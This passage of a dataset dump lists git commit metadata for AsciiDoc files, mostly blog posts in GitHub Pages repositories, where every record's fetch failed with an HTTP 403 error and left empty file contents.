2018-04-23-Crypto-Zombies.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faa53c4cd71c680d230831bf40ab0327ca5869ac","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0967705c55e795094e62c7c5b4007fbce6fca9b4","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d0d02c36b7148f4b309505b6cfa445de5555c66","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4449ceb1f8ef09506910fe7ce31e1d71a57a2070","subject":"doc updates","message":"doc updates\n","repos":"cfn-stacks\/artifacts3-plugin","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfn-stacks\/artifacts3-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e1d6772f2e4ba05dc37f222711e14bf047dc892","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"089ccbc4b0d9b554599c2bbdf99b438c11cc6c0d","subject":"Update 2017-04-07-Incontri-nei-boschi.adoc","message":"Update 2017-04-07-Incontri-nei-boschi.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Incontri-nei-boschi.adoc","new_file":"_posts\/2017-04-07-Incontri-nei-boschi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52178edb0b8203fe25bc6d72465d1f0e47134faa","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d63db69db2911a244df4ee97deaca0d9f11b77","subject":"Update 2015-09-02-Liebes-Tagebuch.adoc","message":"Update 2015-09-02-Liebes-Tagebuch.adoc","repos":"dbect\/dbect.github.io,dbect\/dbect.github.io,dbect\/dbect.github.io","old_file":"_posts\/2015-09-02-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-09-02-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbect\/dbect.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d2f79f51fb0788593873cee053376b8f1f0deef","subject":"Update 2017-07-14-Your-Blog-title.adoc","message":"Update 2017-07-14-Your-Blog-title.adoc","repos":"TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting","old_file":"_posts\/2017-07-14-Your-Blog-title.adoc","new_file":"_posts\/2017-07-14-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TunnyTraffic\/gh-hosting.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39377ad1bfd7a950f986b96231ba07a948313e5f","subject":"Update 2015-02-18-Post-3.adoc","message":"Update 2015-02-18-Post-3.adoc","repos":"DimShadoWWW\/blog,DimShadoWWW\/blog,DimShadoWWW\/blog","old_file":"_posts\/2015-02-18-Post-3.adoc","new_file":"_posts\/2015-02-18-Post-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DimShadoWWW\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebe128cffc76aa216fd8d27fa950527548cea41","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/eastern_european_man.adoc","new_file":"content\/writings\/eastern_european_man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d01a6b766dce18b8c9179cfc00255531ed96d4a7","subject":"Update 2017-02-03-Title.adoc","message":"Update 2017-02-03-Title.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-03-Title.adoc","new_file":"_posts\/2017-02-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"296613665c94330ca9c3bec360e18ce16b38ab83","subject":"Update 2018-09-10-weeks.adoc","message":"Update 2018-09-10-weeks.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-10-weeks.adoc","new_file":"_posts\/2018-09-10-weeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a4d975f432cf24df0056162dd476ffee9618eb0","subject":"Update 2017-05-19-Network-construction.adoc","message":"Update 2017-05-19-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-construction.adoc","new_file":"_posts\/2017-05-19-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8472c982ae4a954c89f88a08f6615dc115661d5b","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e56ef979103455d76c57745b0205292a5e17896","subject":"Renamed '_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc' to '_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc'","message":"Renamed '_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc' to '_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc","new_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c008cc6a3b615154b94273b806f3430e915ad00a","subject":"Add CHANGESv2 to track important changes for V2 (breaking changes).","message":"Add CHANGESv2 to track important changes for V2 (breaking changes).\n","repos":"gdamore\/tcell,zyedidia\/tcell,gdamore\/tcell,zyedidia\/tcell","old_file":"CHANGESv2.adoc","new_file":"CHANGESv2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdamore\/tcell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c51bffd2fdc9ca36edbaa89dfba7a3197e2d8f78","subject":"Update 2016-02-09-My-title.adoc","message":"Update 2016-02-09-My-title.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-09-My-title.adoc","new_file":"_posts\/2016-02-09-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fb703f306c18f473b314bd6891f78becf83e116","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ce9113d162253b65644359291e93755471f7b8","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399a3f5c5da6c1a0ae57c99bc3dcbf29a96607dc","subject":"COMPILING: Zip is used for `make dist` also","message":"COMPILING: Zip is used for `make dist` also\n","repos":"CWolfRU\/freedoom,jmtd\/freedoom,jmtd\/freedoom,CWolfRU\/freedoom,jmtd\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmtd\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e9d6401bce0edc9bfceb7603efda8f2823a82a98","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8765b8b1bb1112f96ca3d3aeeacec3dd16e2dc","subject":"Adding deleted file custom_control.adoc","message":"Adding deleted file custom_control.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/custom_controls.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/custom_controls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"08cd85147b9e5e481715fa7b7a48c5014eb17f3c","subject":"y2b create post MY NEW FAVORITE DISPLAY","message":"y2b create post MY NEW FAVORITE DISPLAY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-27-MY-NEW-FAVORITE-DISPLAY.adoc","new_file":"_posts\/2016-06-27-MY-NEW-FAVORITE-DISPLAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8e7c5432080bd77f4e35d7f7d3250e38bed88c8","subject":"Wording Objets","message":"Wording Objets\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ed0258a3d10f7a63bee39d2c46527d7570a6e8","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58a0f82b6e30baafead5921a84a37703f39024bd","subject":"Update 2016-11-07-Sunday-Night-Dream.adoc","message":"Update 2016-11-07-Sunday-Night-Dream.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da50c81c101386c8c917f49d6e815471e210250a","subject":"Worked on GZIP documentation","message":"Worked on GZIP documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/GZIP compressed stream format.asciidoc","new_file":"documentation\/GZIP compressed stream format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b77b6555e42f87c6aab914defc301701a9bca09","subject":"Update 2015-07-04-Hi.adoc","message":"Update 2015-07-04-Hi.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"_posts\/2015-07-04-Hi.adoc","new_file":"_posts\/2015-07-04-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54f339debe8b7b05b248ef04a9fd46b44ab40787","subject":"Update 199399.adoc","message":"Update 199399.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/199399.adoc","new_file":"_posts\/199399.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4e928ea362be844658e642d40350d36e899b89","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ba9f7525842d709e3977b3acf0bc64326b29c1e","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e17def3fe6335c2eed7996677016c9eec6061638","subject":"Update 2016-06-05-Hong-Kong.adoc","message":"Update 2016-06-05-Hong-Kong.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-05-Hong-Kong.adoc","new_file":"_posts\/2016-06-05-Hong-Kong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a94315e6531a7d0b41c191c7d27d5a4561164b8","subject":"Update 2016-09-26-Participa.adoc","message":"Update 2016-09-26-Participa.adoc","repos":"mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"_posts\/2016-09-26-Participa.adoc","new_file":"_posts\/2016-09-26-Participa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mozillahonduras\/mozillahonduras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"736350fe10a7b65e2c4c2a911dbbdd526b37e341","subject":"Add guide for MP Metrics","message":"Add guide for MP Metrics\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/metrics-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/metrics-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75274211e7039761112c67d1f4554ef4cab72fd6","subject":"Update 2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","message":"Update 2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","repos":"flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io","old_file":"_posts\/2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","new_file":"_posts\/2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flavienliger\/flavienliger.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3570519b200a0ffbd713798bc8aabd6f36ed3b7","subject":"[docs] Add \"one client only\" best practice for kudu-spark","message":"[docs] Add \"one client only\" best practice for kudu-spark\n\nChange-Id: Ibaf369315b8627674ba64e6418d153568ded6fe8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11409\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce47529dacd7d1d85916b5d58d5679f762f38448","subject":"Add documentation","message":"Add documentation\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de71ce2ffc5cb156981fd545a7056e189e341e1d","subject":"Update 2017-01-20-notification-Google-Apps-Script.adoc","message":"Update 2017-01-20-notification-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be1b41747dcb4881102b5bc24b3e0727f00d50a3","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc04a0139db0af1c58c754e05abb1bae403e96ea","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c82005601a2fbb48d5c9b7c44f63fe21444158e","subject":"fixed swarm mode inacurracies and added tutorial to use docker service create","message":"fixed swarm mode inacurracies and added tutorial to use docker service create\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"982daeb3fa6c710fef130b0b62d55f0da1536f57","subject":"y2b create post Black Friday in Canada!","message":"y2b create post Black Friday in Canada!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-25-Black-Friday-in-Canada.adoc","new_file":"_posts\/2011-11-25-Black-Friday-in-Canada.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f37fc21a082d30ad0631bd071fde86ddce3f6ffa","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e391c49e3561c215f3a8bec9bbd43e651e38e69","subject":"Update 2016-02-15-This-is-my-first-post.adoc","message":"Update 2016-02-15-This-is-my-first-post.adoc","repos":"hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io","old_file":"_posts\/2016-02-15-This-is-my-first-post.adoc","new_file":"_posts\/2016-02-15-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hitamutable\/hitamutable.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb03c9874ec3ea2aa030dee887b841d7112686d2","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 